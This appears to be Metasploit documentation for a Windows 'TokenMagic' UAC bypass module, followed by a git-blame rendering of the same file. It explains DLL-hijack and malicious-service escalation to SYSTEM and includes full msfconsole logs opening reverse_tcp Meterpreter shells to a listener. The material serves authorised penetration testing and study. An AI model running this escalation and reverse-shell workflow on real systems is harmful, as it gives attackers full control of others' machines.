documentation/modules/exploit/windows/local/tokenmagic.md

## Vulnerable Application
This module exploits a UAC bypass in windows that allows the attacker to obtain
remote code execution by leveraged a privileged file write. From the [PoC](https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/UAC-TokenMagic.ps1):

>Essentially we duplicate the token of an elevated process, lower it's mandatory
integrity level, use it to create a new restricted token, impersonate it and
use the Secondary Logon service to spawn a new process with High IL. Like
playing hide-and-go-seek with tokens

The module exploits the high IL gained from the "token magic" by either starting a malicious service or by performing a DLL hijack
on a known DLL in `system32`.

### Installation And Setup
Windows 10 versions 1803 is vulnerable out of the box. Token Magic works on Windows 7sp1, 8, 8,1 and Windows 10 instances up to 1803. The DLL
hijacking method in this module relies on a DLL that is only usable in Windows 1703 - 1803 and will not work on other
versions. Also note the DLL method uses a trigger that can take up to ten minutes to return a shell.  The technique
may work on Windows 7 sp0, but loading powershell appears to crash the session.  You might be able to upload and run
the powershell script manually after some edits to accomplish access to a Windows 7 sp0 target.

## Verification Steps
 1. Start msfconsole
 2. Get a Meterpreter session
 3. Do: `use exploit/windows/local/tokenmagic`
 4. Set the `METHOD` of exploitation, either `DLL` or `SERVICE`
 5. Set the `LHOST`, `SESSION` and `PAYLOAD` options
 6. Do: `run`
 7. You should get a shell, the exploitation process should be fairly instantaneous

## Options
  **METHOD**
  Select between DLL hijacking and service exploitation
  * DLL mode: Using the elevated privileges from token magic the module will write a malicious file to `c:\windows\system32\windowscoredeviceinfo.dll`, a temporary host process is spawned and a DLL trigger is injected into the process to call the `usoclient`. When the `usoclient` EXE runs it loads the the malicious DLL `windowscoredeviceinfo.dll` with `SYSTEM` level privileges.
  * SERVICE mode: Using the elevated privileges from token magic the module, create a malicious service, and then start it with `SYSTEM` level privileges

  **SERVICE_FILENAME**
  Filename for Service Payload (Random by default).

  **SERVICE_NAME**
  Service Name to use (Random by default).

  **SESSION**
  The session to run this module on.

  **WRITABLE_DIR**
  Directory to write file to (`%TEMP%` by default).

## Scenarios

### Tested on Windows 10 x64 1803 (Build 17134) via DLL Hijacking
```
msf6 > use multi/handler
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 172.16.199.1
lhost => 172.16.199.1
emsf6 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.16.199.1     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Sending stage (200262 bytes) to 172.16.199.135
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.135:49941) at 2021-05-14 12:38:30 -0400

meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use windows/local/tokenmagic
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/tokenmagic) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(windows/local/tokenmagic) > set lport 4443
lport => 4443
msf6 exploit(windows/local/tokenmagic) > set session 1
session => 1
msf6 exploit(windows/local/tokenmagic) > set method DLL
method => DLL
msf6 exploit(windows/local/tokenmagic) > options

Module options (exploit/windows/local/tokenmagic):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   METHOD            DLL              yes       SERVICE or DLL, please select which attack method you would like to use (SERVICE by default).
Note that the System Orchestrator service which loads the overwritten DLL when using the DLL method can take up to 10
minutes to trigger (Accepted: SERVICE, DLL)
   SERVICE_FILENAME  IfoTziL          no        Filename for Service Payload (Random by default).
   SERVICE_NAME      NTSHIUUVp        no        Service Name to use (Random by default).
   SESSION           1                yes       The session to run this module on.
   WRITABLE_DIR                       no        Directory to write file to (%TEMP% by default).


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.16.199.1     yes       The listen address (an interface may be specified)
   LPORT     4443             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(windows/local/tokenmagic) > run

[*] Started reverse TCP handler on 172.16.199.1:4443
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Checking Target
[*] Attempting to PrivEsc on DESKTOP-O5RD7G3 via session ID: 1
[*] Uploading payload to C:\Users\msfuser\AppData\Local\Temp\WindowsCoreDeviceInfo.dll
[*] Running Exploit on DESKTOP-O5RD7G3
[*] Executing TokenMagic PowerShell script
[*] Reflectively injecting exploit DLL into a spare process and triggering the LPE...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[+] Enjoy the shell!
[*] Sending stage (200262 bytes) to 172.16.199.135
[*] Meterpreter session 2 opened (172.16.199.1:4443 -> 172.16.199.135:49803) at 2021-05-14 12:52:58 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-O5RD7G3
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x64/windows
meterpreter >
```

### Tested on Windows 10 x64 1803 (Build 17134) via service exploitation
```
msf6 > use multi/handler
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Sending stage (200262 bytes) to 172.16.199.135
[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.135:49874) at 2021-05-14 12:18:40 -0400

meterpreter > bg
[*] Backgrounding session 2...
msf6 exploit(multi/handler) > use windows/local/tokenmagic
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/tokenmagic) > options

Module options (exploit/windows/local/tokenmagic):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   METHOD            SERVICE          yes       SERVICE or DLL, please select which attack method you would like to use (SERVICE by default).
Note that the System Orchestrator service which loads the overwritten DLL when using the DLL method can take up to 10
minutes to trigger (Accepted: SERVICE, DLL)
   SERVICE_FILENAME  dbfkhe           no        Filename for Service Payload (Random by default).
   SERVICE_NAME      BNPzhEQL         no        Service Name to use (Random by default).
   SESSION                            yes       The session to run this module on.
   WRITABLE_DIR                       no        Directory to write file to (%TEMP% by default).


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(windows/local/tokenmagic) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(windows/local/tokenmagic) > set lport 4443
lport => 4443
msf6 exploit(windows/local/tokenmagic) > set session 2
session => 2
msf6 exploit(windows/local/tokenmagic) > run

[*] Started reverse TCP handler on 172.16.199.1:4443
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Checking Target
[*] Attempting to PrivEsc on DESKTOP-O5RD7G3 via session ID: 2
[*] Uploading payload to C:\Users\msfuser\AppData\Local\Temp\dbfkhe.exe
[*] Running Exploit on DESKTOP-O5RD7G3
[*] Executing TokenMagic PowerShell script
[+] Enjoy the shell!
[*] Sending stage (200262 bytes) to 172.16.199.135
[+] Deleted C:\Users\msfuser\AppData\Local\Temp\dbfkhe.exe
[*] Meterpreter session 3 opened (172.16.199.1:4443 -> 172.16.199.135:49876) at 2021-05-14 12:19:24 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-O5RD7G3
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x64/windows
meterpreter >
```
beta draft 2021-05-07 16:15:19 -04:00			`## Vulnerable Application`
Add final touches to documentation for code highlights and minor fixes 2021-05-14 17:02:06 -05:00			`This module exploits a UAC bypass in windows that allows the attacker to obtain`
beta draft 2021-05-07 16:15:19 -04:00			`remote code execution by leveraged a privileged file write. From the [PoC](https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/UAC-TokenMagic.ps1):`

			`>Essentially we duplicate the token of an elevated process, lower it's mandatory`
			`integrity level, use it to create a new restricted token, impersonate it and`
			`use the Secondary Logon service to spawn a new process with High IL. Like`
			`playing hide-and-go-seek with tokens`

spelling fixes on docs 2023-10-10 14:46:18 -04:00			`The module exploits the high IL gained from the "token magic" by either starting a malicious service or by performing a DLL hijack`
Add final touches to documentation for code highlights and minor fixes 2021-05-14 17:02:06 -05:00			on a known DLL in `system32`.
beta draft 2021-05-07 16:15:19 -04:00
			`### Installation And Setup`
Update check method and move it to earlier in the module to prevent crashing 2021-05-19 15:58:40 -05:00			`Windows 10 versions 1803 is vulnerable out of the box. Token Magic works on Windows 7sp1, 8, 8,1 and Windows 10 instances up to 1803. The DLL`
Add final touches to documentation for code highlights and minor fixes 2021-05-14 17:02:06 -05:00			`hijacking method in this module relies on a DLL that is only usable in Windows 1703 - 1803 and will not work on other`
Update check method and move it to earlier in the module to prevent crashing 2021-05-19 15:58:40 -05:00			`versions. Also note the DLL method uses a trigger that can take up to ten minutes to return a shell. The technique`
			`may work on Windows 7 sp0, but loading powershell appears to crash the session. You might be able to upload and run`
			`the powershell script manually after some edits to accomplish access to a Windows 7 sp0 target.`
beta draft 2021-05-07 16:15:19 -04:00
			`## Verification Steps`
			`1. Start msfconsole`
Addressed comments 2021-05-13 11:43:07 -04:00			`2. Get a Meterpreter session`
Add final touches to documentation for code highlights and minor fixes 2021-05-14 17:02:06 -05:00			3. Do: `use exploit/windows/local/tokenmagic`
			4. Set the `METHOD` of exploitation, either `DLL` or `SERVICE`
			5. Set the `LHOST`, `SESSION` and `PAYLOAD` options
			6. Do: `run`
			`7. You should get a shell, the exploitation process should be fairly instantaneous`
beta draft 2021-05-07 16:15:19 -04:00
			`## Options`
			`METHOD`
			`Select between DLL hijacking and service exploitation`
Update documentation where possible for changed exploits 2021-07-20 15:54:09 -05:00			* DLL mode: Using the elevated privileges from token magic the module will write a malicious file to `c:\windows\system32\windowscoredeviceinfo.dll`, a temporary host process is spawned and a DLL trigger is injected into the process to call the `usoclient`. When the `usoclient` EXE runs it loads the the malicious DLL `windowscoredeviceinfo.dll` with `SYSTEM` level privileges.
Add final touches to documentation for code highlights and minor fixes 2021-05-14 17:02:06 -05:00			* SERVICE mode: Using the elevated privileges from token magic the module, create a malicious service, and then start it with `SYSTEM` level privileges
beta draft 2021-05-07 16:15:19 -04:00
Add final touches to documentation for code highlights and minor fixes 2021-05-14 17:02:06 -05:00			`SERVICE_FILENAME`
Addressed comments 2021-05-13 11:43:07 -04:00			`Filename for Service Payload (Random by default).`
beta draft 2021-05-07 16:15:19 -04:00
Add final touches to documentation for code highlights and minor fixes 2021-05-14 17:02:06 -05:00			`SERVICE_NAME`
Addressed comments 2021-05-13 11:43:07 -04:00			`Service Name to use (Random by default).`
beta draft 2021-05-07 16:15:19 -04:00
Add final touches to documentation for code highlights and minor fixes 2021-05-14 17:02:06 -05:00			`SESSION`
beta draft 2021-05-07 16:15:19 -04:00			`The session to run this module on.`

Add final touches to documentation for code highlights and minor fixes 2021-05-14 17:02:06 -05:00			`WRITABLE_DIR`
			Directory to write file to (`%TEMP%` by default).
beta draft 2021-05-07 16:15:19 -04:00
			`## Scenarios`

			`### Tested on Windows 10 x64 1803 (Build 17134) via DLL Hijacking`
			```
			`msf6 > use multi/handler`
Added wfsdelay, updated docs 2021-05-11 19:38:14 -04:00			`[*] Using configured payload windows/x64/meterpreter/reverse_tcp`
			`msf6 exploit(multi/handler) > set lhost 172.16.199.1`
			`lhost => 172.16.199.1`
Addressed comments 2021-05-13 11:43:07 -04:00			`emsf6 exploit(multi/handler) > options`
beta draft 2021-05-07 16:15:19 -04:00
Added wfsdelay, updated docs 2021-05-11 19:38:14 -04:00			`Module options (exploit/multi/handler):`
beta draft 2021-05-07 16:15:19 -04:00
Added wfsdelay, updated docs 2021-05-11 19:38:14 -04:00			`Name Current Setting Required Description`
			`---- --------------- -------- -----------`
beta draft 2021-05-07 16:15:19 -04:00

			`Payload options (windows/x64/meterpreter/reverse_tcp):`

			`Name Current Setting Required Description`
			`---- --------------- -------- -----------`
			`EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)`
Added wfsdelay, updated docs 2021-05-11 19:38:14 -04:00			`LHOST 172.16.199.1 yes The listen address (an interface may be specified)`
beta draft 2021-05-07 16:15:19 -04:00			`LPORT 4444 yes The listen port`


			`Exploit target:`

			`Id Name`
			`-- ----`
Added wfsdelay, updated docs 2021-05-11 19:38:14 -04:00			`0 Wildcard Target`
beta draft 2021-05-07 16:15:19 -04:00

Addressed comments 2021-05-13 11:43:07 -04:00			`msf6 exploit(multi/handler) > run`

Add final touches to documentation for code highlights and minor fixes 2021-05-14 17:02:06 -05:00			`[*] Started reverse TCP handler on 172.16.199.1:4444`
Addressed comments 2021-05-13 11:43:07 -04:00			`[*] Sending stage (200262 bytes) to 172.16.199.135`
			`[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.135:49941) at 2021-05-14 12:38:30 -0400`

			`meterpreter > bg`
			`[*] Backgrounding session 1...`
Added wfsdelay, updated docs 2021-05-11 19:38:14 -04:00			`msf6 exploit(multi/handler) > use windows/local/tokenmagic`
			`[*] Using configured payload windows/x64/meterpreter/reverse_tcp`
Addressed comments 2021-05-13 11:43:07 -04:00			`msf6 exploit(windows/local/tokenmagic) > set lhost 172.16.199.1`
			`lhost => 172.16.199.1`
Added wfsdelay, updated docs 2021-05-11 19:38:14 -04:00			`msf6 exploit(windows/local/tokenmagic) > set lport 4443`
			`lport => 4443`
Addressed comments 2021-05-13 11:43:07 -04:00			`msf6 exploit(windows/local/tokenmagic) > set session 1`
			`session => 1`
			`msf6 exploit(windows/local/tokenmagic) > set method DLL`
			`method => DLL`
			`msf6 exploit(windows/local/tokenmagic) > options`

			`Module options (exploit/windows/local/tokenmagic):`

			`Name Current Setting Required Description`
			`---- --------------- -------- -----------`
			`METHOD DLL yes SERVICE or DLL, please select which attack method you would like to use (SERVICE by default).`
			`Note that the System Orchestrator service which loads the overwritten DLL when using the DLL method can take up to 10`
			`minutes to trigger (Accepted: SERVICE, DLL)`
			`SERVICE_FILENAME IfoTziL no Filename for Service Payload (Random by default).`
			`SERVICE_NAME NTSHIUUVp no Service Name to use (Random by default).`
			`SESSION 1 yes The session to run this module on.`
Removed nil script check, updated docs 2021-05-14 16:40:52 -04:00			`WRITABLE_DIR no Directory to write file to (%TEMP% by default).`
Addressed comments 2021-05-13 11:43:07 -04:00

			`Payload options (windows/x64/meterpreter/reverse_tcp):`

			`Name Current Setting Required Description`
			`---- --------------- -------- -----------`
			`EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)`
			`LHOST 172.16.199.1 yes The listen address (an interface may be specified)`
			`LPORT 4443 yes The listen port`


			`Exploit target:`

			`Id Name`
			`-- ----`
			`0 Automatic`


beta draft 2021-05-07 16:15:19 -04:00			`msf6 exploit(windows/local/tokenmagic) > run`

Add final touches to documentation for code highlights and minor fixes 2021-05-14 17:02:06 -05:00			`[*] Started reverse TCP handler on 172.16.199.1:4443`
beta draft 2021-05-07 16:15:19 -04:00			`[*] Executing automatic check (disable AutoCheck to override)`
			`[+] The target appears to be vulnerable.`
Addressed comments 2021-05-13 11:43:07 -04:00			`[*] Checking Target`
beta draft 2021-05-07 16:15:19 -04:00			`[*] Attempting to PrivEsc on DESKTOP-O5RD7G3 via session ID: 1`
			`[*] Uploading payload to C:\Users\msfuser\AppData\Local\Temp\WindowsCoreDeviceInfo.dll`
			`[*] Running Exploit on DESKTOP-O5RD7G3`
Addressed comments 2021-05-13 11:43:07 -04:00			`[*] Executing TokenMagic PowerShell script`
Update documentation where possible for changed exploits 2021-07-20 15:54:09 -05:00			`[*] Reflectively injecting exploit DLL into a spare process and triggering the LPE...`
Added wfsdelay, updated docs 2021-05-11 19:38:14 -04:00			`[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.`
Addressed comments 2021-05-13 11:43:07 -04:00			`[+] Enjoy the shell!`
beta draft 2021-05-07 16:15:19 -04:00			`[*] Sending stage (200262 bytes) to 172.16.199.135`
Addressed comments 2021-05-13 11:43:07 -04:00			`[*] Meterpreter session 2 opened (172.16.199.1:4443 -> 172.16.199.135:49803) at 2021-05-14 12:52:58 -0400`
Added wfsdelay, updated docs 2021-05-11 19:38:14 -04:00
beta draft 2021-05-07 16:15:19 -04:00			`meterpreter > getuid`
			`Server username: NT AUTHORITY\SYSTEM`
			`meterpreter > sysinfo`
			`Computer : DESKTOP-O5RD7G3`
			`OS : Windows 10 (10.0 Build 17134).`
			`Architecture : x64`
			`System Language : en_US`
			`Domain : WORKGROUP`
Added wfsdelay, updated docs 2021-05-11 19:38:14 -04:00			`Logged On Users : 3`
beta draft 2021-05-07 16:15:19 -04:00			`Meterpreter : x64/windows`
Add final touches to documentation for code highlights and minor fixes 2021-05-14 17:02:06 -05:00			`meterpreter >`
beta draft 2021-05-07 16:15:19 -04:00			```

Addressed comments 2021-05-13 11:43:07 -04:00			`### Tested on Windows 10 x64 1803 (Build 17134) via service exploitation`
beta draft 2021-05-07 16:15:19 -04:00			```
			`msf6 > use multi/handler`
			`[*] Using configured payload windows/x64/meterpreter/reverse_tcp`
Addressed comments 2021-05-13 11:43:07 -04:00			`msf6 exploit(multi/handler) > options`
beta draft 2021-05-07 16:15:19 -04:00
Addressed comments 2021-05-13 11:43:07 -04:00			`Module options (exploit/multi/handler):`
beta draft 2021-05-07 16:15:19 -04:00
Addressed comments 2021-05-13 11:43:07 -04:00			`Name Current Setting Required Description`
			`---- --------------- -------- -----------`
beta draft 2021-05-07 16:15:19 -04:00

			`Payload options (windows/x64/meterpreter/reverse_tcp):`

			`Name Current Setting Required Description`
			`---- --------------- -------- -----------`
			`EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)`
			`LHOST yes The listen address (an interface may be specified)`
			`LPORT 4444 yes The listen port`


			`Exploit target:`

			`Id Name`
			`-- ----`
Addressed comments 2021-05-13 11:43:07 -04:00			`0 Wildcard Target`
beta draft 2021-05-07 16:15:19 -04:00

Addressed comments 2021-05-13 11:43:07 -04:00			`msf6 exploit(multi/handler) > set lhost 172.16.199.1`
			`lhost => 172.16.199.1`
			`msf6 exploit(multi/handler) > set lport 4444`
			`lport => 4444`
			`msf6 exploit(multi/handler) > run`

Add final touches to documentation for code highlights and minor fixes 2021-05-14 17:02:06 -05:00			`[*] Started reverse TCP handler on 172.16.199.1:4444`
Addressed comments 2021-05-13 11:43:07 -04:00			`[*] Sending stage (200262 bytes) to 172.16.199.135`
			`[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.135:49874) at 2021-05-14 12:18:40 -0400`

			`meterpreter > bg`
			`[*] Backgrounding session 2...`
			`msf6 exploit(multi/handler) > use windows/local/tokenmagic`
			`[*] Using configured payload windows/x64/meterpreter/reverse_tcp`
			`msf6 exploit(windows/local/tokenmagic) > options`
beta draft 2021-05-07 16:15:19 -04:00
			`Module options (exploit/windows/local/tokenmagic):`

			`Name Current Setting Required Description`
			`---- --------------- -------- -----------`
			`METHOD SERVICE yes SERVICE or DLL, please select which attack method you would like to use (SERVICE by default).`
Addressed comments 2021-05-13 11:43:07 -04:00			`Note that the System Orchestrator service which loads the overwritten DLL when using the DLL method can take up to 10`
			`minutes to trigger (Accepted: SERVICE, DLL)`
			`SERVICE_FILENAME dbfkhe no Filename for Service Payload (Random by default).`
			`SERVICE_NAME BNPzhEQL no Service Name to use (Random by default).`
			`SESSION yes The session to run this module on.`
Removed nil script check, updated docs 2021-05-14 16:40:52 -04:00			`WRITABLE_DIR no Directory to write file to (%TEMP% by default).`
beta draft 2021-05-07 16:15:19 -04:00

			`Payload options (windows/x64/meterpreter/reverse_tcp):`

			`Name Current Setting Required Description`
			`---- --------------- -------- -----------`
			`EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)`
Addressed comments 2021-05-13 11:43:07 -04:00			`LHOST yes The listen address (an interface may be specified)`
			`LPORT 4444 yes The listen port`
beta draft 2021-05-07 16:15:19 -04:00

			`Exploit target:`

			`Id Name`
			`-- ----`
			`0 Automatic`


Addressed comments 2021-05-13 11:43:07 -04:00			`msf6 exploit(windows/local/tokenmagic) > set lhost 172.16.199.1`
			`lhost => 172.16.199.1`
			`msf6 exploit(windows/local/tokenmagic) > set lport 4443`
			`lport => 4443`
			`msf6 exploit(windows/local/tokenmagic) > set session 2`
			`session => 2`
beta draft 2021-05-07 16:15:19 -04:00			`msf6 exploit(windows/local/tokenmagic) > run`

Add final touches to documentation for code highlights and minor fixes 2021-05-14 17:02:06 -05:00			`[*] Started reverse TCP handler on 172.16.199.1:4443`
beta draft 2021-05-07 16:15:19 -04:00			`[*] Executing automatic check (disable AutoCheck to override)`
			`[+] The target appears to be vulnerable.`
Addressed comments 2021-05-13 11:43:07 -04:00			`[*] Checking Target`
			`[*] Attempting to PrivEsc on DESKTOP-O5RD7G3 via session ID: 2`
			`[*] Uploading payload to C:\Users\msfuser\AppData\Local\Temp\dbfkhe.exe`
			`[*] Running Exploit on DESKTOP-O5RD7G3`
			`[*] Executing TokenMagic PowerShell script`
			`[+] Enjoy the shell!`
			`[*] Sending stage (200262 bytes) to 172.16.199.135`
			`[+] Deleted C:\Users\msfuser\AppData\Local\Temp\dbfkhe.exe`
			`[*] Meterpreter session 3 opened (172.16.199.1:4443 -> 172.16.199.135:49876) at 2021-05-14 12:19:24 -0400`
beta draft 2021-05-07 16:15:19 -04:00
			`meterpreter > getuid`
			`Server username: NT AUTHORITY\SYSTEM`
			`meterpreter > sysinfo`
Addressed comments 2021-05-13 11:43:07 -04:00			`Computer : DESKTOP-O5RD7G3`
			`OS : Windows 10 (10.0 Build 17134).`
beta draft 2021-05-07 16:15:19 -04:00			`Architecture : x64`
			`System Language : en_US`
			`Domain : WORKGROUP`
			`Logged On Users : 3`
			`Meterpreter : x64/windows`
Add final touches to documentation for code highlights and minor fixes 2021-05-14 17:02:06 -05:00			`meterpreter >`
Addressed comments 2021-05-13 11:43:07 -04:00			```